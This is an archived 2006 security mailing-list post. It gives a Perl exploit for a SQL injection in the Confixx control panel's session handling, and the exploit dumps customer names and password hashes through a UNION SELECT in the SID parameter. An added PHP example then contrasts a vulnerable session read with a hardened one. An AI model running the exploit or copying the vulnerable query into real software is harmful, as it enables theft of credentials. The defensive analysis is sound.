[Full-disclosure] Confixx Index.PHP SQL Injection Vulnerability (Exploit - not new vuln)
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Confixx Index.PHP SQL Injection Vulnerability (Exploit - not new vuln)
- From: defa <defa@xxxxxxxxxxxx>
- Date: Wed, 19 Apr 2006 00:00:59 +0200
Here is more information on the confixx vuln released by LoK Crew.
Sorry for the poor quality of this posting, I was short of time.
Product:
^^^^^^^
Confixx is a comprehensive control panel that provides the best
value, proven quality, fully developed feature set and quality
support. The software’s powerful features have been especially
designed to meet the requirements of hosting providers.
More -> http://www.swsoft.com/en/products/confixx/
Risk: High - eventually remote root access
^^^^
Severity: High
^^^^^^^^
Discussion:
^^^^^^^^^^^
The vuln itself can be found in the html/session.inc.php in the
function sessao_read( $sKey ) which is used to overwrite the php-own
session methods.
The file "loginform.php" can be used to display e.g. admin hashes.
Read the rest by studying the attached exploit.
Reference:
^^^^^^^^^^
Vuln was published by LoK-Crew here:
http://venom.sam-city.com/confixx2.txt
Read more:
^^^^^^^^^^^
http://www.securityfocus.com/bid/17476/
Code:
^^^^^
--------------- <snip> -------------
#!/usr/bin/perl
# Code as posted; line wraps introduced by the mail archive have been rejoined
# and descriptive comments added. Behaviour is unchanged.
use IO::Socket;

if (@ARGV < 1)
{
print q(
exploit by defa (2006)
=========================
confixx_exploit.pl [URL]
params:
[URL] - server url
);
exit;
}

$serv = $ARGV[0];
$serv =~ s/^http:\/\///;    # strip the scheme, only the host part is used

for ($i=0;$i<=100;$i++)
{
    #$i=1;
    $hit = 0;
    # The SID parameter closes the quoted id, nulls the real lookup (AND 0=1) and
    # UNIONs in one row shaped like serialised session data ("_error|s:N:\"...\";"),
    # so the application stores the selected columns in $_SESSION['_error'] and
    # echoes them. LIMIT $i,1 steps through the kunden table one row per request.
    $url = "http://";
    $url .= $serv;
    $url .= "/user/index.php?SID=1'%20AND%200=1%20UNION%20SELECT%20CONCAT";
    $url .= "('_error|s:',length(longpw)%2Blength(kunde)%2B8,':%22','HIT:%20',";
    $url .= "kunde,'%20:%20',longpw,'%22;')%20AS%20'sdata'%20FROM%20kunden%20LIMIT%20";
    $url .= "$i,1/*";

    # As posted, the TCP connection goes to localhost; $serv only appears in the Host header.
    $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "localhost", PeerPort => "80") || die "[-] CONNECT FAILED\r\n";
    print $socket "GET $url HTTP/1.1\n";
    print $socket "Host: $serv\n";
    print $socket 'User-Agent: confixx_exploit'."\n";
    print $socket "Connection: close\n\n";

    # A hit is recognised by the "<p>HIT:" marker the payload placed in the page.
    while ($answer = <$socket>)
    {
        if ($answer =~ /<p>HIT:/)
        {
            # $answer =~ s/<[A-Z,a-z,=].+>//g;
            print "$answer";
            $hit = 1;
        }
    }
    if ($hit == 0) {die("that's it");}    # no row came back: table exhausted
}
--------------- <snap> -------------
bye
defa
--
don't eat yellow snow
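The root cause described above is a database-backed session store whose read function takes the client-supplied session id and builds SQL from it; because PHP then unserialises whatever read() returns, the UNION row in the exploit both reads the kunden table and decides what lands in $_SESSION. The following is an added example written for this page, not Confixx's code and not the LoK-Crew or defa material: a custom PHP session handler with the vulnerable read kept for contrast beside a hardened one. The table and column names (sessions.sid, sessions.sdata, sessions.updated), the $pdo handle and the SQLite back end are assumptions for illustration.

```php
<?php
// Added example (not Confixx code). A custom session store that replaces PHP's own
// session methods, shown once with the id pasted into SQL and once hardened.
// Table/column names and the PDO/SQLite setup are assumptions for illustration.
declare(strict_types=1);

final class DbSessionHandler implements SessionHandlerInterface
{
    public function __construct(private PDO $pdo) {}

    // VULNERABLE (kept only for contrast): $sKey arrives straight from the cookie or
    // ?SID= parameter and is interpolated into the query, so a value that closes the
    // quote and appends UNION SELECT ... /* reads any table, and the selected text is
    // then fed to PHP's session decoder as if it were this user's session data.
    public function readUnsafe(string $sKey): string
    {
        $stmt = $this->pdo->query("SELECT sdata FROM sessions WHERE sid = '$sKey'");
        $row = $stmt ? $stmt->fetch(PDO::FETCH_ASSOC) : false;
        return $row === false ? '' : (string) $row['sdata'];
    }

    // HARDENED: only ids shaped like the ones PHP generates reach the database
    // (22..256 characters from [A-Za-z0-9,-], the range allowed by session.sid_length
    // and session.sid_bits_per_character), and the id is bound, never spliced into SQL.
    public static function isValidSessionId(string $sKey): bool
    {
        return preg_match('/^[A-Za-z0-9,-]{22,256}$/', $sKey) === 1;
    }

    public function read(string $sKey): string|false
    {
        if (!self::isValidSessionId($sKey)) {
            return '';   // malformed id: treated as "no session", PHP starts a fresh one
        }
        $stmt = $this->pdo->prepare('SELECT sdata FROM sessions WHERE sid = :sid');
        $stmt->execute([':sid' => $sKey]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row === false ? '' : (string) $row['sdata'];
    }

    public function write(string $sKey, string $sData): bool
    {
        if (!self::isValidSessionId($sKey)) {
            return false;
        }
        $stmt = $this->pdo->prepare(
            'INSERT INTO sessions (sid, sdata, updated) VALUES (:sid, :sdata, :t)
             ON CONFLICT(sid) DO UPDATE SET sdata = excluded.sdata, updated = excluded.updated'
        );
        return $stmt->execute([':sid' => $sKey, ':sdata' => $sData, ':t' => time()]);
    }

    public function destroy(string $sKey): bool
    {
        $stmt = $this->pdo->prepare('DELETE FROM sessions WHERE sid = :sid');
        return $stmt->execute([':sid' => $sKey]);
    }

    public function gc(int $maxLifetime): int|false
    {
        $stmt = $this->pdo->prepare('DELETE FROM sessions WHERE updated < :cutoff');
        $stmt->execute([':cutoff' => time() - $maxLifetime]);
        return $stmt->rowCount();
    }

    public function open(string $path, string $name): bool { return true; }
    public function close(): bool { return true; }
}

// Stand-alone check against an in-memory SQLite database with constructed data.
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE sessions (sid TEXT PRIMARY KEY, sdata TEXT NOT NULL, updated INTEGER NOT NULL)');
$handler = new DbSessionHandler($pdo);

$goodId = str_repeat('a', 32);                 // shape of a default 32-character id
$handler->write($goodId, 'user|s:5:"alice";');
var_dump($handler->read($goodId));             // the stored serialised data comes back

// A SID carrying SQL syntax (constructed, mirrors the shape used in the advisory)
// never reaches the query: the regex rejects it and read() reports no session.
$injected = "1' AND 0=1 UNION SELECT 'x' AS sdata FROM sessions LIMIT 0,1/*";
var_dump(DbSessionHandler::isValidSessionId($injected));
var_dump($handler->read($injected));

// To use it for real sessions:
// session_set_save_handler($handler, true);
// session_start();
```

Two points worth keeping from this: the format check is what stops the exploit's payload, since a session id that cannot be generated by PHP has no business being looked up at all, and the prepared statement is what keeps the lookup safe even if a future id format is broader than the regex. Both checks belong in write() and destroy() too, since the same client value flows through them.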
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/